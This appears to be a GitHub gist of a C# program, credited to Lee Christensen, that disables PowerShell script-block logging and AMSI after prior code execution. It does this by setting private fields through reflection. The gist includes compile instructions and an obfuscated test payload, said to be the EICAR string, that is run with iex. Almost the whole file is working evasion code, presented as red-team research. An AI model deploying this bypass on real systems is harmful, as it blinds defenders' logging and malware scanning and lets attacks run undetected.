This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management.Automation; | |
| using System.Reflection; | |
| namespace PSLoggingBypass | |
| { | |
| /* | |
| One of the many ways one could disabled PS logging/AMSI if there's prior code execution. | |
| Author: Lee Christensen (@tifkin_) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| Instructions: | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe DisablePSLogging.cs /reference:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| */ | |
| class Program | |
| { | |
| public static void Main(string[] args) | |
| { | |
| // The code invokes the EICAR test string in order test AMSI | |
| string Command = @" | |
| $ErrorActionPreference = 'Stop' | |
| $base64 = 'FHJ+YHoTZ1ZARxNgUl5DX1YJEwRWBAFQAFBWHgsFAlEeBwAACh4LBAcDHgNSUAIHCwdQAgALBRQ=' | |
| $bytes = [Convert]::FromBase64String($base64) | |
| $string = -join ($bytes | % { [char] ($_ -bxor 0x33) }) | |
| iex $string | |
| [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); | |
| [System.Windows.Forms.MessageBox]::Show('Hello from PowerShell!'); | |
| "; | |
| bool BypassAmsi = false; | |
| InvokePS(Command, BypassAmsi); | |
| Console.WriteLine("\nPress any key to test bypass..."); | |
| Console.ReadKey(); | |
| BypassAmsi = true; | |
| InvokePS(Command, BypassAmsi); | |
| } | |
| public static void InvokePS(string Command, bool BypassAmsi) | |
| { | |
| try | |
| { | |
| using (PowerShell PowerShellInstance = PowerShell.Create()) | |
| { | |
| // Disable ScriptBlockLogging | |
| // | |
| // In PowerShell: | |
| // $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static'); | |
| // $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()); | |
| // $EtwProvider.SetValue($null, $EventProvider); | |
| var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); | |
| if (PSEtwLogProvider != null) | |
| { | |
| var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); | |
| var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); | |
| EtwProvider.SetValue(null, EventProvider); | |
| } | |
| // Disable AMSI | |
| // In PowerShell: [Ref].Assembly.GetType('http://System.Management .Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) | |
| var AmsiUtils = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); | |
| if (AmsiUtils != null && BypassAmsi == true) | |
| { | |
| AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); | |
| } | |
| PowerShellInstance.AddScript(Command); | |
| PowerShellInstance.Invoke(); | |
| } | |
| } | |
| catch (Exception e) | |
| { | |
| Console.WriteLine("ERRROR: " + e.Message); | |
| } | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment